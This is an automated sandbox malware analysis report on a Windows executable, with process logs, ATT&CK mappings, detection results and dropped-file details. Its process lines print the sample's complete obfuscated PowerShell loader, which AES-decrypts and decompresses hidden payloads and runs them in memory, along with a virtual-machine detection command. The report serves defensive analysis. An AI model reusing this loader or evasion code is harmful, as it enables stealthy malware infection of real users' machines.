                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: 5840 1Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"QEMU HARDDISK" /c:"WDS100T2B0A" Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function FpxON($kXGHT){ $MjRuR=[System.Security.Cryptography.Aes]::Create(); $MjRuR.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MjRuR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MjRuR.Key=[System.Convert]::FromBase64String('j3+l8MVXgSNKBboFFtDIY9ifLLQEhU8Shlqb9W611kU='); $MjRuR.IV=[System.Convert]::FromBase64String('C7Dlt1nshFAIyjxeP0iXIQ=='); $WVvmF=$MjRuR.CreateDecryptor(); $CVTyC=$WVvmF.TransformFinalBlock($kXGHT, 0, $kXGHT.Length); $WVvmF.Dispose(); $MjRuR.Dispose(); $CVTyC;}function ogptr($kXGHT){ Invoke-Expression '$bJDne=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$kXGHT);'.Replace('blck', ''); Invoke-Expression '$eTtPQ=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$gtTnv=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($bJDne, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $gtTnv.CopyTo($eTtPQ); $gtTnv.Dispose(); $bJDne.Dispose(); $eTtPQ.Dispose(); $eTtPQ.ToArray();}function VcYYT($kXGHT,$GOojW){ Invoke-Expression '$CHMLi=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$kXGHT);'.Replace('blck', ''); Invoke-Expression '$WMCoT=$CHMLi.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$WMCoT.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $GOojW)blck;'.Replace('blck', '');}$YesWH = 'C:\Users\user\AppData\Local\Temp\IXP000.TMP\vclib.bat';$host.UI.RawUI.WindowTitle = $YesWH;$lzgCG=[System.IO.File]::ReadAllText($YesWH).Split([Environment]::NewLine);foreach ($zwDbB in $lzgCG) { if ($zwDbB.StartsWith(':: ')) { $gGIZq=$zwDbB.Substring(3); break; }}$nciXK=[string[]]$gGIZq.Split('\');Invoke-Expression '$mmTjj=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[0])));'.Replace('blck', '');Invoke-Expression '$gDpGZ=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[1])));'.Replace('blck', '');VcYYT $mmTjj (,[string[]] (''));VcYYT $gDpGZ (,[string[]] ('')); Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function fpxon($kxght){ $mjrur=[system.security.cryptography.aes]::create(); $mjrur.mode=[system.security.cryptography.ciphermode]::cbc; $mjrur.padding=[system.security.cryptography.paddingmode]::pkcs7; $mjrur.key=[system.convert]::frombase64string('j3+l8mvxgsnkbbofftdiy9ifllqehu8shlqb9w611ku='); $mjrur.iv=[system.convert]::frombase64string('c7dlt1nshfaiyjxep0ixiq=='); $wvvmf=$mjrur.createdecryptor(); $cvtyc=$wvvmf.transformfinalblock($kxght, 0, $kxght.length); $wvvmf.dispose(); $mjrur.dispose(); $cvtyc;}function ogptr($kxght){ invoke-expression '$bjdne=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$kxght);'.replace('blck', ''); invoke-expression '$ettpq=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$gttnv=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($bjdne, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $gttnv.copyto($ettpq); $gttnv.dispose(); $bjdne.dispose(); $ettpq.dispose(); $ettpq.toarray();}function vcyyt($kxght,$goojw){ invoke-expression '$chmli=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$kxght);'.replace('blck', ''); invoke-expression '$wmcot=$chmli.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$wmcot.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $goojw)blck;'.replace('blck', '');}$yeswh = 'c:\users\user\appdata\local\temp\ixp000.tmp\vclib.bat';$host.ui.rawui.windowtitle = $yeswh;$lzgcg=[system.io.file]::readalltext($yeswh).split([environment]::newline);foreach ($zwdbb in $lzgcg) { if ($zwdbb.startswith(':: ')) { $ggizq=$zwdbb.substring(3); break; }}$ncixk=[string[]]$ggizq.split('\');invoke-expression '$mmtjj=ogptr (fpxon (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ncixk[0])));'.replace('blck', '');invoke-expression '$gdpgz=ogptr (fpxon (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ncixk[1])));'.replace('blck', '');vcyyt $mmtjj (,[string[]] (''));vcyyt $gdpgz (,[string[]] (''));
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function fpxon($kxght){ $mjrur=[system.security.cryptography.aes]::create(); $mjrur.mode=[system.security.cryptography.ciphermode]::cbc; $mjrur.padding=[system.security.cryptography.paddingmode]::pkcs7; $mjrur.key=[system.convert]::frombase64string('j3+l8mvxgsnkbbofftdiy9ifllqehu8shlqb9w611ku='); $mjrur.iv=[system.convert]::frombase64string('c7dlt1nshfaiyjxep0ixiq=='); $wvvmf=$mjrur.createdecryptor(); $cvtyc=$wvvmf.transformfinalblock($kxght, 0, $kxght.length); $wvvmf.dispose(); $mjrur.dispose(); $cvtyc;}function ogptr($kxght){ invoke-expression '$bjdne=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$kxght);'.replace('blck', ''); invoke-expression '$ettpq=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$gttnv=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($bjdne, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $gttnv.copyto($ettpq); $gttnv.dispose(); $bjdne.dispose(); $ettpq.dispose(); $ettpq.toarray();}function vcyyt($kxght,$goojw){ invoke-expression '$chmli=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$kxght);'.replace('blck', ''); invoke-expression '$wmcot=$chmli.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$wmcot.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $goojw)blck;'.replace('blck', '');}$yeswh = 'c:\users\user\appdata\local\temp\ixp000.tmp\vclib.bat';$host.ui.rawui.windowtitle = $yeswh;$lzgcg=[system.io.file]::readalltext($yeswh).split([environment]::newline);foreach ($zwdbb in $lzgcg) { if ($zwdbb.startswith(':: ')) { $ggizq=$zwdbb.substring(3); break; }}$ncixk=[string[]]$ggizq.split('\');invoke-expression '$mmtjj=ogptr (fpxon (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ncixk[0])));'.replace('blck', '');invoke-expression '$gdpgz=ogptr (fpxon (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ncixk[1])));'.replace('blck', '');vcyyt $mmtjj (,[string[]] (''));vcyyt $gdpgz (,[string[]] ('')); Jump to behavior
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeCode function: 0_2_00007FF776D11258 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,0_2_00007FF776D11258
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeCode function: 0_2_00007FF776D18BF4 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,0_2_00007FF776D18BF4
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeCode function: 0_2_00007FF776D13D34 GetVersionExA,MessageBeep,MessageBoxA,0_2_00007FF776D13D34
                    Source: Amcache.hve.10.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.10.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.10.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.10.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                    Source: Amcache.hve.10.drBinary or memory string: MsMpEng.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information1
                    Scripting                    		Valid Accounts11
                    Windows Management Instrumentation                    		1
                    Scripting                    		1
                    DLL Side-Loading                    		1
                    Software Packing                    		OS Credential Dumping1
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		2
                    Encrypted Channel                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts1
                    Native API                    		1
                    DLL Side-Loading                    		1
                    Access Token Manipulation                    		1
                    Timestomp                    		LSASS Memory1
                    File and Directory Discovery                    		Remote Desktop ProtocolData from Removable Media1
                    Non-Application Layer Protocol                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts12
                    Command and Scripting Interpreter                    		1
                    Office Application Startup                    		211
                    Process Injection                    		1
                    DLL Side-Loading                    		Security Account Manager115
                    System Information Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive1
                    Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts1
                    PowerShell                    		1
                    Registry Run Keys / Startup Folder                    		1
                    Registry Run Keys / Startup Folder                    		11
                    Masquerading                    		NTDS231
                    Security Software Discovery                    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script231
                    Virtualization/Sandbox Evasion                    		LSA Secrets1
                    Process Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Access Token Manipulation                    		Cached Domain Credentials231
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
                    Process Injection                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Rundll32                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528503 Sample: XgKnAQpuPM.exe Startdate: 08/10/2024 Architecture: WINDOWS Score: 92 30 198.187.3.20.in-addr.arpa 2->30 38 Malicious sample detected (through community Yara rule) 2->38 40 Yara detected UAC Bypass using CMSTP 2->40 42 .NET source code contains potential unpacker 2->42 44 3 other signatures 2->44 9 XgKnAQpuPM.exe 1 3 2->9         started        12 rundll32.exe 2->12         started        signatures3 process4 file5 28 C:\Users\user\AppData\Local\...\vclib.bat, DOS 9->28 dropped 14 cmd.exe 1 9->14         started        process6 signatures7 46 Suspicious powershell command line found 14->46 48 Suspicious command line found 14->48 17 powershell.exe 30 14->17         started        20 WMIC.exe 1 14->20         started        22 conhost.exe 14->22         started        24 2 other processes 14->24 process8 signatures9 32 Sets debug register (to hijack the execution of another thread) 17->32 34 Modifies the context of a thread in another process (thread injection) 17->34 26 WerFault.exe 20 16 17->26         started        36 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 20->36 process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    XgKnAQpuPM.exe11%ReversingLabs

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://nuget.org/NuGet.exe0%URL Reputationsafe
                    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                    https://contoso.com/0%URL Reputationsafe
                    https://nuget.org/nuget.exe0%URL Reputationsafe
                    https://contoso.com/License0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    http://upx.sf.net0%URL Reputationsafe
                    https://aka.ms/pscore60%URL Reputationsafe
                    https://aka.ms/pscore680%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    198.187.3.20.in-addr.arpa
                    		unknown
                    		unknownfalse
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.2185544424.000001C69008B000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.2029388668.000001C6802D2000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.2029388668.000001C6802D2000.00000004.00000001.00020000.00000000.sdmpfalse
                        		unknown
                        https://contoso.com/powershell.exe, 00000007.00000002.2185544424.000001C69008B000.00000004.00000001.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.2185544424.000001C69008B000.00000004.00000001.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/Licensepowershell.exe, 00000007.00000002.2185544424.000001C69008B000.00000004.00000001.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://aka.ms/pscore6xGpowershell.exe, 00000007.00000002.2029388668.000001C680001000.00000004.00000001.00020000.00000000.sdmpfalse
                          		unknown
                          https://contoso.com/Iconpowershell.exe, 00000007.00000002.2185544424.000001C69008B000.00000004.00000001.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://upx.sf.netAmcache.hve.10.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://aka.ms/pscore6powershell.exe, 00000007.00000002.2029388668.000001C680001000.00000004.00000001.00020000.00000000.sdmp, Null.7.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://aka.ms/pscore68powershell.exe, 00000007.00000002.2029388668.000001C680001000.00000004.00000001.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.2029388668.000001C680001000.00000004.00000001.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.2029388668.000001C6802D2000.00000004.00000001.00020000.00000000.sdmpfalse
                            		unknown

                            World Map of Contacted IPs

                            No contacted IP infos

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1528503
                            Start date and time:2024-10-08 00:28:03 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 6m 39s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Run name:Run with higher sleep bypass
                            Number of analysed new started processes analysed:17
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:XgKnAQpuPM.exe
                            renamed because original name is a hash value
                            Original Sample Name:52c1acdcbb715dd099648b26b98254e8.exe
                            Detection:MAL
                            Classification:mal92.expl.evad.winEXE@14/11@1/0
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 27
                            • Number of non-executed functions: 36
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 20.189.173.22
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtFsControlFile calls found.
                            • Report size getting too big, too many NtSetInformationFile calls found.
                            • VT rate limit hit for: XgKnAQpuPM.exe

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            No context

                            Domains

                            No context

                            ASNs

                            No context

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_182771bb2de693611997bcf38ec45e5dde0b99b_e3b0f337_5fde02a2-d24a-4ba3-88bb-27bd6fc5d898\Report.wer

                            Download File
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.4572196546028324
                            Encrypted:false
                            SSDEEP:192:AosYUe23mG52c80exqojaVTy78RJlmzuiFkZ24lO8n:p322G528exqoj+TZRrmzuiFkY4lO8n
                            MD5:214AD5BF391B7D24931E0C1CCE2112C0
                            SHA1:577704E3AB7C9F165B40C131D81975A428231E6C
                            SHA-256:E2C7CE4A6E1039616AEA0814FF7BB86719A8A2D44D7520D46320958ED8277ACB
                            SHA-512:AB033CCC6EF8C34B1E5097AC62C3EDF07446BF53FAB83CE3196A3E6640D08746D14623C26C61BBD005063002BC72BC17D84603EFF0D39E95AEE837DA951A7B34
                            Malicious:false
                            Reputation:low
                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.1.3.7.5.3.7.6.5.7.5.6.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.8.1.3.7.5.5.4.0.6.3.8.4.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.f.d.e.0.2.a.2.-.d.2.4.a.-.4.b.a.3.-.8.8.b.b.-.2.7.b.d.6.f.c.5.d.8.9.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.6.6.e.b.5.f.8.-.a.e.c.d.-.4.d.c.7.-.8.4.5.f.-.4.f.4.d.7.8.6.d.4.f.c.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.p.o.w.e.r.s.h.e.l.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.1.8.-.0.0.0.1.-.0.0.1.4.-.8.8.f.f.-.a.6.5.2.0.8.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.

                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERAC0C.tmp.dmp

                            Download File
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:Mini DuMP crash report, 15 streams, Mon Oct 7 22:29:14 2024, 0x1205a4 type
                            Category:dropped
                            Size (bytes):844304
                            Entropy (8bit):3.440795532252442
                            Encrypted:false
                            SSDEEP:6144:8aMn0ivwbd7Sk5o3QWgqurn/2YOSA6Q0a442XvvBL+5qyp:8akk5cQXqujESABZ44mhwqy
                            MD5:08941B8A9D2276911F51959527A7545D
